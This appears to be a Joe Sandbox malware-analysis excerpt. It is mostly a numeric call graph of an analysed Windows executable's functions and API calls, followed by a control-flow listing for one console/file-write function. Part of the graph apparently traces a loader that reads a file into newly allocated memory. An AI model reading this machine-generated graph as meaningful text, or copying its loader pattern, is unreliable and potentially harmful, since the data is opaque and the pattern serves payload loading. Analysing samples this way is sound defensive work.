95243->95250 95244 853200 311 API calls 95244->95250 95245->95217 95245->95224 95245->95226 95245->95229 95245->95230 95245->95231 95245->95232 95245->95234 95245->95236 95245->95240 95245->95250 95351 884cbe 49 API calls Mailbox 95245->95351 95352 841caa 49 API calls 95245->95352 95353 842aae 335 API calls 95245->95353 95354 89ccb2 50 API calls 95245->95354 95355 887a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95245->95355 95356 886532 63 API calls 3 library calls 95245->95356 95247 84d6e9 55 API calls 95247->95250 95248 88cc5c 86 API calls 95248->95250 95249 84ce19 48 API calls 95249->95250 95250->95197 95250->95201 95250->95203 95250->95207 95250->95209 95250->95212 95250->95213 95250->95214 95250->95215 95250->95218 95250->95219 95250->95222 95250->95229 95250->95235 95250->95241 95250->95243 95250->95244 95250->95245 95250->95247 95250->95248 95250->95249 95251 842aae 311 API calls 95250->95251 95263 84ef00 95250->95263 95270 84f110 95250->95270 95335 85e244 95250->95335 95340 85dc5f 95250->95340 95345 84eed0 335 API calls Mailbox 95250->95345 95350 8a8d23 48 API calls 95250->95350 95251->95250 95252->94295 95253->94295 95254->94295 95255->94295 95256->94295 95257->94295 95258->94295 95259->94295 95260->94295 95261->94295 95262->95188 95264 84ef1d 95263->95264 95265 84ef2f 95263->95265 95357 84e3b0 335 API calls 2 library calls 95264->95357 95358 88cc5c 86 API calls 4 library calls 95265->95358 95267 84ef26 95267->95250 95269 8b86f9 95269->95269 95271 84f130 95270->95271 95274 84fe30 335 API calls 95271->95274 95278 84f199 95271->95278 95272 84f3dd 95275 8b87c8 95272->95275 95283 84f3f2 95272->95283 95319 84f431 Mailbox 95272->95319 95273 84f595 95280 84d7f7 48 API calls 95273->95280 95273->95319 95276 8b8728 95274->95276 95363 88cc5c 86 API calls 4 library calls 95275->95363 95276->95278 95360 88cc5c 86 API calls 4 library calls 95276->95360 95278->95272 95278->95273 95281 84d7f7 48 API calls 95278->95281 95314 84f229 95278->95314 95282 8b87a3 95280->95282 95285 8b8772 95281->95285 95362 860f0a 52 API calls __cinit 95282->95362 95313 84f418 95283->95313 95364 889af1 48 API calls 95283->95364 95284 8b8b1b 95304 8b8bcf 95284->95304 95305 8b8b2c 95284->95305 95361 860f0a 52 API calls __cinit 95285->95361 95288 84f770 95292 8b8a45 95288->95292 95311 84f77a 95288->95311 95290 84d6e9 55 API calls 95290->95319 95291 8b8b7e 95373 89e40a 335 API calls Mailbox 95291->95373 95370 85c1af 48 API calls 95292->95370 95293 8b8c53 95378 88cc5c 86 API calls 4 library calls 95293->95378 95294 8b8810 95365 89eef8 335 API calls 95294->95365 95295 84fe30 335 API calls 95316 84f6aa 95295->95316 95296 88cc5c 86 API calls 95296->95319 95297 8b8beb 95376 89bdbd 335 API calls Mailbox 95297->95376 95299 84fe30 335 API calls 95299->95319 95375 88cc5c 86 API calls 4 library calls 95304->95375 95372 89f5ee 335 API calls 95305->95372 95306 851b90 48 API calls 95306->95319 95307 851b90 48 API calls 95307->95319 95311->95307 95312 8b8c00 95334 84f537 Mailbox 95312->95334 95377 88cc5c 86 API calls 4 library calls 95312->95377 95313->95284 95313->95316 95313->95319 95314->95272 95314->95273 95314->95313 95314->95319 95315 84fce0 95315->95334 95374 88cc5c 86 API calls 4 library calls 95315->95374 95316->95288 95316->95295 95316->95315 95316->95319 95316->95334 95318 8b8823 95318->95313 95322 8b884b 95318->95322 95319->95290 95319->95291 95319->95293 95319->95296 95319->95297 95319->95299 95319->95306 95319->95315 95319->95334 95359 84dd47 48 API calls ___crtGetEnvironmentStringsW 95319->95359 95371 8797ed InterlockedDecrement 95319->95371 95379 85c1af 48 API calls 95319->95379 95366 89ccdc 48 API calls 95322->95366 95324 8b8857 95326 8b88aa 95324->95326 95327 8b8865 95324->95327 95331 8b88a0 Mailbox 95326->95331 95368 88a69d 48 API calls 95326->95368 95367 889b72 48 API calls 95327->95367 95328 84fe30 335 API calls 95328->95334 95331->95328 95332 8b88e7 95369 84bc74 48 API calls 95332->95369 95334->95250 95336 85e253 95335->95336 95337 8bdf42 95335->95337 95336->95250 95338 8bdf77 95337->95338 95339 8bdf59 TranslateAcceleratorW 95337->95339 95339->95336 95341 85dca3 95340->95341 95343 85dc71 95340->95343 95341->95250 95342 85dc96 IsDialogMessageW 95342->95341 95342->95343 95343->95341 95343->95342 95344 8bdd1d GetClassLongW 95343->95344 95344->95342 95344->95343 95345->95250 95346->95203 95347->95196 95348->95200 95349->95250 95350->95250 95351->95245 95352->95245 95353->95245 95354->95245 95355->95245 95356->95245 95357->95267 95358->95269 95359->95319 95360->95278 95361->95314 95362->95319 95363->95334 95364->95294 95365->95318 95366->95324 95367->95331 95368->95332 95369->95331 95370->95319 95371->95319 95372->95319 95373->95315 95374->95334 95375->95334 95376->95312 95377->95334 95378->95334 95379->95319 95380 8b9c06 95391 85d3be 95380->95391 95382 8b9c1c 95390 8b9c91 Mailbox 95382->95390 95400 841caa 49 API calls 95382->95400 95384 853200 335 API calls 95385 8b9cc5 95384->95385 95388 8ba7ab Mailbox 95385->95388 95402 88cc5c 86 API calls 4 library calls 95385->95402 95387 8b9c71 95387->95385 95401 88b171 48 API calls 95387->95401 95390->95384 95392 85d3dc 95391->95392 95393 85d3ca 95391->95393 95395 85d3e2 95392->95395 95396 85d40b 95392->95396 95403 84dcae 50 API calls Mailbox 95393->95403 95399 85f4ea 48 API calls 95395->95399 95404 84dcae 50 API calls Mailbox 95396->95404 95398 85d3d4 95398->95382 95399->95398 95400->95387 95401->95390 95402->95388 95403->95398 95404->95398 95405 8b197b 95410 85dd94 95405->95410 95409 8b198a 95411 85f4ea 48 API calls 95410->95411 95412 85dd9c 95411->95412 95413 85ddb0 95412->95413 95418 85df3d 95412->95418 95417 860f0a 52 API calls __cinit 95413->95417 95417->95409 95419 85df46 95418->95419 95420 85dda8 95418->95420 95450 860f0a 52 API calls __cinit 95419->95450 95422 85ddc0 95420->95422 95423 84d7f7 48 API calls 95422->95423 95424 85ddd7 GetVersionExW 95423->95424 95425 846a63 48 API calls 95424->95425 95426 85de1a 95425->95426 95451 85dfb4 95426->95451 95432 8b24c8 95434 85dea4 GetCurrentProcess 95468 85df5f LoadLibraryA GetProcAddress 95434->95468 95435 85debb 95436 85df31 GetSystemInfo 95435->95436 95437 85dee3 95435->95437 95440 85df0e 95436->95440 95462 85e00c 95437->95462 95442 85df21 95440->95442 95443 85df1c FreeLibrary 95440->95443 95442->95413 95443->95442 95444 85df29 GetSystemInfo 95447 85df03 95444->95447 95445 85def9 95465 85dff4 95445->95465 95447->95440 95449 85df09 FreeLibrary 95447->95449 95449->95440 95450->95420 95452 85dfbd 95451->95452 95453 84b18b 48 API calls 95452->95453 95454 85de22 95453->95454 95455 846571 95454->95455 95456 84657f 95455->95456 95457 84b18b 48 API calls 95456->95457 95458 84658f 95457->95458 95458->95432 95459 85df77 95458->95459 95469 85df89 95459->95469 95473 85e01e 95462->95473 95466 85e00c 2 API calls 95465->95466 95467 85df01 GetNativeSystemInfo 95466->95467 95467->95447 95468->95435 95470 85dea0 95469->95470 95471 85df92 LoadLibraryA 95469->95471 95470->95434 95470->95435 95471->95470 95472 85dfa3 GetProcAddress 95471->95472 95472->95470 95474 85def1 95473->95474 95475 85e027 LoadLibraryA 95473->95475 95474->95444 95474->95445 95475->95474 95476 85e038 GetProcAddress 95475->95476 95476->95474 95477 8b19ba 95482 85c75a 95477->95482 95481 8b19c9 95483 84d7f7 48 API calls 95482->95483 95484 85c7c8 95483->95484 95490 85d26c 95484->95490 95486 85c865 95487 85c881 95486->95487 95493 85d1fa 48 API calls ___crtGetEnvironmentStringsW 95486->95493 95489 860f0a 52 API calls __cinit 95487->95489 95489->95481 95494 85d298 95490->95494 95493->95486 95495 85d28b 95494->95495 95496 85d2a5 95494->95496 95495->95486 95496->95495 95497 85d2ac RegOpenKeyExW 95496->95497 95497->95495 95498 85d2c6 RegQueryValueExW 95497->95498 95499 85d2fc RegCloseKey 95498->95499 95500 85d2e7 95498->95500 95499->95495 95500->95499 95501 8b8eb8 95505 88a635 95501->95505 95503 8b8ec3 95504 88a635 84 API calls 95503->95504 95504->95503 95511 88a66f 95505->95511 95512 88a642 95505->95512 95506 88a671 95517 85ec4e 81 API calls 95506->95517 95507 88a676 95509 84936c 81 API calls 95507->95509 95510 88a67d 95509->95510 95513 84510d 48 API calls 95510->95513 95511->95503 95512->95506 95512->95507 95512->95511 95514 88a669 95512->95514 95513->95511 95516 854525 61 API calls ___crtGetEnvironmentStringsW 95514->95516 95516->95511 95517->95507 95518 84f030 95519 853b70 335 API calls 95518->95519 95520 84f03c 95519->95520 95521 8b19dd 95526 844a30 95521->95526 95523 8b19f1 95546 860f0a 52 API calls __cinit 95523->95546 95525 8b19fb 95527 844a40 __ftell_nolock 95526->95527 95528 84d7f7 48 API calls 95527->95528 95529 844af6 95528->95529 95547 845374 95529->95547 95531 844aff 95554 84363c 95531->95554 95534 84518c 48 API calls 95535 844b18 95534->95535 95560 8464cf 95535->95560 95538 84d7f7 48 API calls 95539 844b32 95538->95539 95566 8449fb 95539->95566 95541 8461a6 48 API calls 95543 844b3d _wcscat Mailbox __NMSG_WRITE 95541->95543 95542 844b43 Mailbox 95542->95523 95543->95541 95543->95542 95544 84ce19 48 API calls 95543->95544 95545 8464cf 48 API calls 95543->95545 95544->95543 95545->95543 95546->95525 95580 86f8a0 95547->95580 95550 84ce19 48 API calls 95551 8453a7 95550->95551 95582 84660f 95551->95582 95553 8453b1 Mailbox 95553->95531 95555 843649 __ftell_nolock 95554->95555 95589 84366c GetFullPathNameW 95555->95589 95557 84365a 95558 846a63 48 API calls 95557->95558 95559 843669 95558->95559 95559->95534 95561 84651b 95560->95561 95565 8464dd ___crtGetEnvironmentStringsW 95560->95565 95564 85f4ea 48 API calls 95561->95564 95562 85f4ea 48 API calls 95563 844b29 95562->95563 95563->95538 95564->95565 95565->95562 95591 84bcce 95566->95591 95569 8b41cc RegQueryValueExW 95571 8b4246 RegCloseKey 95569->95571 95572 8b41e5 95569->95572 95570 844a2b 95570->95543 95573 85f4ea 48 API calls 95572->95573 95574 8b41fe 95573->95574 95575 8447b7 48 API calls 95574->95575 95576 8b4208 RegQueryValueExW 95575->95576 95577 8b4224 95576->95577 95579 8b423b 95576->95579 95578 846a63 48 API calls 95577->95578 95578->95579 95579->95571 95581 845381 GetModuleFileNameW 95580->95581 95581->95550 95583 86f8a0 __ftell_nolock 95582->95583 95584 84661c GetFullPathNameW 95583->95584 95585 846a63 48 API calls 95584->95585 95586 846643 95585->95586 95587 846571 48 API calls 95586->95587 95588 84664f 95587->95588 95588->95553 95590 84368a 95589->95590 95590->95557 95592 84bce8 95591->95592 95596 844a0a RegOpenKeyExW 95591->95596 95593 85f4ea 48 API calls 95592->95593 95594 84bcf2 95593->95594 95595 85ee75 48 API calls 95594->95595 95595->95596 95596->95569 95596->95570 95597 eb04b3 95598 eb04ba 95597->95598 95599 eb0558 95598->95599 95600 eb04c2 95598->95600 95617 eb0e08 9 API calls 95599->95617 95604 eb0168 95600->95604 95603 eb053f 95605 eadb58 GetPEB 95604->95605 95608 eb0207 95605->95608 95607 eb0238 CreateFileW 95607->95608 95611 eb0245 95607->95611 95609 eb0261 VirtualAlloc 95608->95609 95608->95611 95615 eb0368 CloseHandle 95608->95615 95616 eb0378 VirtualFree 95608->95616 95618 eb1078 GetPEB 95608->95618 95610 eb0282 ReadFile 95609->95610 95609->95611 95610->95611 95614 eb02a0 VirtualAlloc 95610->95614 95612 eb0462 95611->95612 95613 eb0454 VirtualFree 95611->95613 95612->95603 95613->95612 95614->95608 95614->95611 95615->95608 95616->95608 95617->95603 95619 eb10a2 95618->95619 95619->95607 95620 865dfd 95621 865e09 __mtinitlocknum 95620->95621 95657 867eeb GetStartupInfoW 95621->95657 95624 865e0e 95659 869ca7 GetProcessHeap 95624->95659 95625 865e66 95626 865e71 95625->95626 95744 865f4d 47 API calls 3 library calls 95625->95744 95660 867b47 95626->95660 95629 865e77 95630 865e82 __RTC_Initialize 95629->95630 95745 865f4d 47 API calls 3 library calls 95629->95745 95681 86acb3 95630->95681 95633 865e91 95634 865e9d GetCommandLineW 95633->95634 95746 865f4d 47 API calls 3 library calls 95633->95746 95700 872e7d GetEnvironmentStringsW 95634->95700 95637 865e9c 95637->95634 95641 865ec2 95713 872cb4 95641->95713 95644 865ec8 95645 865ed3 95644->95645 95748 86115b 47 API calls 3 library calls 95644->95748 95727 861195 95645->95727 95648 865edb 95649 865ee6 __wwincmdln 95648->95649 95749 86115b 47 API calls 3 library calls 95648->95749 95731 843a0f 95649->95731 95652 865efa 95653 865f09 95652->95653 95750 8613f1 47 API calls _doexit 95652->95750 95751 861186 47 API calls _doexit 95653->95751 95656 865f0e __mtinitlocknum 95658 867f01 95657->95658 95658->95624 95659->95625 95752 86123a 30 API calls 2 library calls 95660->95752 95662 867b4c 95753 867e23 InitializeCriticalSectionAndSpinCount 95662->95753 95664 867b51 95665 867b55 95664->95665 95755 867e6d TlsAlloc 95664->95755 95754 867bbd 50 API calls 2 library calls 95665->95754 95668 867b5a 95668->95629 95669 867b67 95669->95665 95670 867b72 95669->95670 95756 866986 95670->95756 95673 867bb4 95764 867bbd 50 API calls 2 library calls 95673->95764 95676 867b93 95676->95673 95678 867b99 95676->95678 95677 867bb9 95677->95629 95763 867a94 47 API calls 4 library calls 95678->95763 95680 867ba1 GetCurrentThreadId 95680->95629 95682 86acbf __mtinitlocknum 95681->95682 95683 867cf4 __lock 47 API calls 95682->95683 95684 86acc6 95683->95684 95685 866986 __calloc_crt 47 API calls 95684->95685 95687 86acd7 95685->95687 95686 86ad42 GetStartupInfoW 95694 86ae80 95686->95694 95697 86ad57 95686->95697 95687->95686 95688 86ace2 __mtinitlocknum @_EH4_CallFilterFunc@8 95687->95688 95688->95633 95689 86af44 95773 86af58 LeaveCriticalSection _doexit 95689->95773 95691 86aec9 GetStdHandle 95691->95694 95692 866986 __calloc_crt 47 API calls 95692->95697 95693 86aedb GetFileType 95693->95694 95694->95689 95694->95691 95694->95693 95696 86af08 InitializeCriticalSectionAndSpinCount 95694->95696 95695 86ada5 95695->95694 95698 86add7 GetFileType 95695->95698 95699 86ade5 InitializeCriticalSectionAndSpinCount 95695->95699 95696->95694 95697->95692 95697->95694 95697->95695 95698->95695 95698->95699 95699->95695 95701 865ead 95700->95701 95703 872e8e 95700->95703 95707 872a7b GetModuleFileNameW 95701->95707 95774 8669d0 47 API calls __crtCompareStringA_stat 95703->95774 95705 872eb4 ___crtGetEnvironmentStringsW 95706 872eca FreeEnvironmentStringsW 95705->95706 95706->95701 95708 872aaf _wparse_cmdline 95707->95708 95709 865eb7 95708->95709 95710 872ae9 95708->95710 95709->95641 95747 86115b 47 API calls 3 library calls 95709->95747 95775 8669d0 47 API calls __crtCompareStringA_stat 95710->95775 95712 872aef _wparse_cmdline 95712->95709 95714 872ccd __NMSG_WRITE 95713->95714 95718 872cc5 95713->95718 95715 866986 __calloc_crt 47 API calls 95714->95715 95723 872cf6 __NMSG_WRITE 95715->95723 95716 872d4d 95717 861c9d _free 47 API calls 95716->95717 95717->95718 95718->95644 95719 866986 __calloc_crt 47 API calls 95719->95723 95720 872d72 95722 861c9d _free 47 API calls 95720->95722 95722->95718 95723->95716 95723->95718 95723->95719 95723->95720 95724 872d89 95723->95724 95776 872567 47 API calls 2 library calls 95723->95776 95777 866e20 IsProcessorFeaturePresent 95724->95777 95726 872d95 95726->95644 95728 8611a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95727->95728 95730 8611e0 __IsNonwritableInCurrentImage 95728->95730 95792 860f0a 52 API calls __cinit 95728->95792 95730->95648 95732 8b1ebf 95731->95732 95733 843a29 95731->95733 95734 843a63 IsThemeActive 95733->95734 95793 861405 95734->95793 95738 843a8f 95805 843adb SystemParametersInfoW SystemParametersInfoW 95738->95805 95740 843a9b 95806 843d19 95740->95806 95742 843aa3 SystemParametersInfoW 95743 843ac8 95742->95743 95743->95652 95744->95626 95745->95630 95746->95637 95750->95653 95751->95656 95752->95662 95753->95664 95754->95668 95755->95669 95758 86698d 95756->95758 95759 8669ca 95758->95759 95760 8669ab Sleep 95758->95760 95765 8730aa 95758->95765 95759->95673 95762 867ec9 TlsSetValue 95759->95762 95761 8669c2 95760->95761 95761->95758 95761->95759 95762->95676 95763->95680 95764->95677 95766 8730b5 95765->95766 95770 8730d0 __calloc_impl 95765->95770 95767 8730c1 95766->95767 95766->95770 95772 867c0e 47 API calls __getptd_noexit 95767->95772 95768 8730e0 RtlAllocateHeap 95768->95770 95771 8730c6 95768->95771 95770->95768 95770->95771 95771->95758 95772->95771 95773->95688 95774->95705 95775->95712 95776->95723 95778 866e2b 95777->95778 95783 866cb5 95778->95783 95782 866e46 95782->95726 95784 866ccf _memset __call_reportfault 95783->95784 95785 866cef IsDebuggerPresent 95784->95785 95791 8681ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95785->95791 95787 86a70c __call_reportfault 6 API calls 95789 866dd6 95787->95789 95788 866db3 __call_reportfault 95788->95787 95790 868197 GetCurrentProcess TerminateProcess 95789->95790 95790->95782 95791->95788 95792->95730 95794 867cf4 __lock 47 API calls 95793->95794 95795 861410 95794->95795 95858 867e58 LeaveCriticalSection 95795->95858 95797 843a88 95798 86146d 95797->95798 95799 861477 95798->95799 95800 861491 95798->95800 95799->95800 95859 867c0e 47 API calls __getptd_noexit 95799->95859 95800->95738 95802 861481 95860 866e10 8 API calls __vswprintf_l 95802->95860 95804 86148c 95804->95738 95805->95740 95807 843d26 __ftell_nolock 95806->95807 95808 84d7f7 48 API calls 95807->95808 95809 843d31 GetCurrentDirectoryW 95808->95809 95861 8461ca 95809->95861 95811 843d57 IsDebuggerPresent 95812 843d65 95811->95812 95813 8b1cc1 MessageBoxA 95811->95813 95815 8b1cd9 95812->95815 95816 843d82 95812->95816 95845 843e3a 95812->95845 95813->95815 95814 843e41 SetCurrentDirectoryW 95817 843e4e Mailbox 95814->95817 95976 85c682 48 API calls 95815->95976 95935 8440e5 95816->95935 95817->95742 95820 8b1ce9 95825 8b1cff SetCurrentDirectoryW 95820->95825 95825->95817 95845->95814 95858->95797 95859->95802 95860->95804 95978 85e99b 95861->95978 95865 8461eb 95866 845374 50 API calls 95865->95866 95867 8461ff 95866->95867 95868 84ce19 48 API calls 95867->95868 95869 84620c 95868->95869 95995 8439db 95869->95995 95871 846216 Mailbox 95872 846eed 48 API calls 95871->95872 95873 84622b 95872->95873 96007 849048 95873->96007 95876 84ce19 48 API calls 95877 846244 95876->95877 95878 84d6e9 55 API calls 95877->95878 95879 846254 Mailbox 95878->95879 95880 84ce19 48 API calls 95879->95880 95881 84627c 95880->95881 95882 84d6e9 55 API calls 95881->95882 95883 84628f Mailbox 95882->95883 95884 84ce19 48 API calls 95883->95884 95885 8462a0 95884->95885 95886 84d645 53 API calls 95885->95886 95887 8462b2 Mailbox 95886->95887 95888 84d7f7 48 API calls 95887->95888 95889 8462c5 95888->95889 96010 8463fc 95889->96010 95893 8462df 95894 8b1c08 95893->95894 95895 8462e9 95893->95895 95897 8463fc 48 API calls 95894->95897 95896 860fa7 _W_store_winword 59 API calls 95895->95896 95898 8462f4 95896->95898 95899 8b1c1c 95897->95899 95898->95899 95900 8462fe 95898->95900 95902 8463fc 48 API calls 95899->95902 95901 860fa7 _W_store_winword 59 API calls 95900->95901 95903 846309 95901->95903 95904 8b1c38 95902->95904 95903->95904 95905 846313 95903->95905 95906 845374 50 API calls 95904->95906 95907 860fa7 _W_store_winword 59 API calls 95905->95907 95908 8b1c5d 95906->95908 95909 84631e 95907->95909 95910 8463fc 48 API calls 95908->95910 95911 84635f 95909->95911 95912 8b1c86 95909->95912 95916 8463fc 48 API calls 95909->95916 95914 8b1c69 95910->95914 95911->95912 95913 84636c 95911->95913 95917 846eed 48 API calls 95912->95917 95918 85c050 48 API calls 95913->95918 95915 846eed 48 API calls 95914->95915 95919 8b1c77 95915->95919 95920 846342 95916->95920 95921 8b1ca8 95917->95921 95922 846384 95918->95922 95923 8463fc 48 API calls 95919->95923 95924 846eed 48 API calls 95920->95924 95925 8463fc 48 API calls 95921->95925 95927 851b90 48 API calls 95922->95927 95923->95912 95928 846350 95924->95928 95926 8b1cb5 95925->95926 95926->95926 95934 846394 95927->95934 95929 8463fc 48 API calls 95928->95929 95929->95911 95930 851b90 48 API calls 95930->95934 95932 8463fc 48 API calls 95932->95934 95933 8463d6 Mailbox 95933->95811 95934->95930 95934->95932 95934->95933 96026 846b68 48 API calls 95934->96026 95936 8440f2 __ftell_nolock 95935->95936 95937 8b370e _memset 95936->95937 95938 84410b 95936->95938 95940 8b372a GetOpenFileNameW 95937->95940 95939 84660f 49 API calls 95938->95939 95941 844114 95939->95941 95942 8b3779 95940->95942 96068 8440a7 95941->96068 95944 846a63 48 API calls 95942->95944 95947 8b378e 95944->95947 95947->95947 95976->95820 95979 84d7f7 48 API calls 95978->95979 95980 8461db 95979->95980 95981 846009 95980->95981 95982 846016 __ftell_nolock 95981->95982 95983 846a63 48 API calls 95982->95983 95988 84617c Mailbox 95982->95988 95985 846048 95983->95985 95994 84607e Mailbox 95985->95994 96027 8461a6 95985->96027 95986 8461a6 48 API calls 95986->95994 95987 84614f 95987->95988 95989 84ce19 48 API calls 95987->95989 95988->95865 95991 846170 95989->95991 95990 84ce19 48 API calls 95990->95994 95992 8464cf 48 API calls 95991->95992 95992->95988 95993 8464cf 48 API calls 95993->95994 95994->95986 95994->95987 95994->95988 95994->95990 95994->95993 95996 8441a9 136 API calls 95995->95996 95997 8439fe 95996->95997 95998 843a06 95997->95998 96030 88c396 95997->96030 95998->95871 96001 8b2ff0 96003 861c9d _free 47 API calls 96001->96003 96002 844252 84 API calls 96002->96001 96004 8b2ffd 96003->96004 96005 844252 84 API calls 96004->96005 96006 8b3006 96005->96006 96006->96006 96008 85f4ea 48 API calls 96007->96008 96009 846237 96008->96009 96009->95876 96011 846406 96010->96011 96012 84641f 96010->96012 96013 846eed 48 API calls 96011->96013 96014 846a63 48 API calls 96012->96014 96015 8462d1 96013->96015 96014->96015 96016 860fa7 96015->96016 96017 860fb3 96016->96017 96018 861028 96016->96018 96022 860fd8 96017->96022 96065 867c0e 47 API calls __getptd_noexit 96017->96065 96067 86103a 59 API calls 4 library calls 96018->96067 96021 861035 96021->95893 96022->95893 96023 860fbf 96066 866e10 8 API calls __vswprintf_l 96023->96066 96025 860fca 96025->95893 96026->95934 96028 84bdfa 48 API calls 96027->96028 96029 8461b1 96028->96029 96029->95985 96031 844517 83 API calls 96030->96031 96032 88c405 96031->96032 96033 88c56d 94 API calls 96032->96033 96034 88c417 96033->96034 96035 8444ed 64 API calls 96034->96035 96061 88c41b 96034->96061 96036 88c432 96035->96036 96037 8444ed 64 API calls 96036->96037 96038 88c442 96037->96038 96039 8444ed 64 API calls 96038->96039 96040 88c45d 96039->96040 96041 8444ed 64 API calls 96040->96041 96042 88c478 96041->96042 96043 844517 83 API calls 96042->96043 96044 88c48f 96043->96044 96045 86395c __crtCompareStringA_stat 47 API calls 96044->96045 96046 88c496 96045->96046 96047 86395c __crtCompareStringA_stat 47 API calls 96046->96047 96048 88c4a0 96047->96048 96049 8444ed 64 API calls 96048->96049 96050 88c4b4 96049->96050 96051 88bf5a GetSystemTimeAsFileTime 96050->96051 96052 88c4c7 96051->96052 96053 88c4dc 96052->96053 96054 88c4f1 96052->96054 96055 861c9d _free 47 API calls 96053->96055 96056 88c556 96054->96056 96057 88c4f7 96054->96057 96059 88c4e2 96055->96059 96058 861c9d _free 47 API calls 96056->96058 96060 88b965 118 API calls 96057->96060 96058->96061 96062 861c9d _free 47 API calls 96059->96062 96063 88c54e 96060->96063 96061->96001 96061->96002 96062->96061 96064 861c9d _free 47 API calls 96063->96064 96064->96061 96065->96023 96066->96025 96067->96021 96069 86f8a0 __ftell_nolock 96068->96069 96070 8440b4 GetLongPathNameW 96069->96070 96071 846a63 48 API calls 96070->96071 96072 8440dc 96071->96072 96073 8449a0 96072->96073 96074 84d7f7 48 API calls 96073->96074 96075 8449b2 96074->96075 96076 84660f 49 API calls 96075->96076 96077 8449bd 96076->96077 96078 8449c8 96077->96078 96079 8b2e35 96077->96079 96080 8464cf 48 API calls 96078->96080 96084 8b2e4f 96079->96084 96126 85d35e 60 API calls 96079->96126 96126->96079 96278 851799 96279 85f4ea 48 API calls 96278->96279 96280 85173a 96279->96280

                                                                                Executed Functions

                                                                                Function 0086B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 644 86b043-86b080 call 86f8a0 647 86b082-86b084 644->647 648 86b089-86b08b 644->648 649 86b860-86b86c call 86a70c 647->649 650 86b0ac-86b0d9 648->650 651 86b08d-86b0a7 call 867bda call 867c0e call 866e10 648->651 654 86b0e0-86b0e7 650->654 655 86b0db-86b0de 650->655 651->649 659 86b105 654->659 660 86b0e9-86b100 call 867bda call 867c0e call 866e10 654->660 655->654 658 86b10b-86b110 655->658 662 86b112-86b11c call 86f82f 658->662 663 86b11f-86b12d call 873bf2 658->663 659->658 689 86b851-86b854 660->689 662->663 675 86b133-86b145 663->675 676 86b44b-86b45d 663->676 675->676 678 86b14b-86b183 call 867a0d GetConsoleMode 675->678 679 86b463-86b473 676->679 680 86b7b8-86b7d5 WriteFile 676->680 678->676 701 86b189-86b18f 678->701 685 86b55a-86b55f 679->685 686 86b479-86b484 679->686 682 86b7d7-86b7df 680->682 683 86b7e1-86b7e7 GetLastError 680->683 690 86b7e9 682->690 683->690 691 86b565-86b56e 685->691 692 86b663-86b66e 685->692 687 86b48a-86b49a 686->687 688 86b81b-86b833 686->688 694 86b4a0-86b4a3 687->694 695 86b835-86b838 688->695 696 86b83e-86b84e call 867c0e call 867bda 688->696 700 86b85e-86b85f 689->700 698 86b7ef-86b7f1 690->698 691->688 699 86b574 691->699 692->688 697 86b674 692->697 704 86b4a5-86b4be 694->704 705 86b4e9-86b520 WriteFile 694->705 695->696 706 86b83a-86b83c 695->706 696->689 707 86b67e-86b693 697->707 709 86b856-86b85c 698->709 710 86b7f3-86b7f5 698->710 711 86b57e-86b595 699->711 700->649 702 86b191-86b193 701->702 703 86b199-86b1bc GetConsoleCP 701->703 702->676 702->703 712 86b1c2-86b1ca 703->712 713 86b440-86b446 703->713 714 86b4c0-86b4ca 704->714 715 86b4cb-86b4e7 704->715 705->683 716 86b526-86b538 705->716 706->700 717 86b699-86b69b 707->717 709->700 710->688 719 86b7f7-86b7fc 710->719 720 86b59b-86b59e 711->720 721 86b1d4-86b1d6 712->721 713->710 714->715 715->694 715->705 716->698 722 86b53e-86b54f 716->722 723 86b69d-86b6b3 717->723 724 86b6d8-86b719 WideCharToMultiByte 717->724 726 86b812-86b819 call 867bed 719->726 727 86b7fe-86b810 call 867c0e call 867bda 719->727 728 86b5a0-86b5b6 720->728 729 86b5de-86b627 WriteFile 720->729 732 86b1dc-86b1fe 721->732 733 86b36b-86b36e 721->733 722->687 734 86b555 722->734 735 86b6c7-86b6d6 723->735 736 86b6b5-86b6c4 723->736 724->683 738 86b71f-86b721 724->738 726->689 727->689 740 86b5cd-86b5dc 728->740 741 86b5b8-86b5ca 728->741 729->683 731 86b62d-86b645 729->731 731->698 743 86b64b-86b658 731->743 744 86b217-86b223 call 861688 732->744 745 86b200-86b215 732->745 746 86b375-86b3a2 733->746 747 86b370-86b373 733->747 734->698 735->717 735->724 736->735 748 86b727-86b75a WriteFile 738->748 740->720 740->729 741->740 743->711 750 86b65e 743->750 767 86b225-86b239 744->767 768 86b269-86b26b 744->768 751 86b271-86b283 call 8740f7 745->751 753 86b3a8-86b3ab 746->753 747->746 747->753 754 86b75c-86b776 748->754 755 86b77a-86b78e GetLastError 748->755 750->698 771 86b435-86b43b 751->771 772 86b289 751->772 762 86b3b2-86b3c5 call 875884 753->762 763 86b3ad-86b3b0 753->763 754->748 758 86b778 754->758 760 86b794-86b796 755->760 758->760 760->690 766 86b798-86b7b0 760->766 762->683 777 86b3cb-86b3d5 762->777 763->762 769 86b407-86b40a 763->769 766->707 773 86b7b6 766->773 775 86b412-86b42d 767->775 776 86b23f-86b254 call 8740f7 767->776 768->751 769->721 774 86b410 769->774 771->690 778 86b28f-86b2c4 WideCharToMultiByte 772->778 773->698 774->771 775->771 776->771 786 86b25a-86b267 776->786 780 86b3d7-86b3ee call 875884 777->780 781 86b3fb-86b401 777->781 778->771 782 86b2ca-86b2f0 WriteFile 778->782 780->683 789 86b3f4-86b3f5 780->789 781->769 782->683 785 86b2f6-86b30e 782->785 785->771 788 86b314-86b31b 785->788 786->778 788->781 790 86b321-86b34c WriteFile 788->790 789->781 790->683 791 86b352-86b359 790->791 791->771 792 86b35f-86b366 791->792 792->781
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
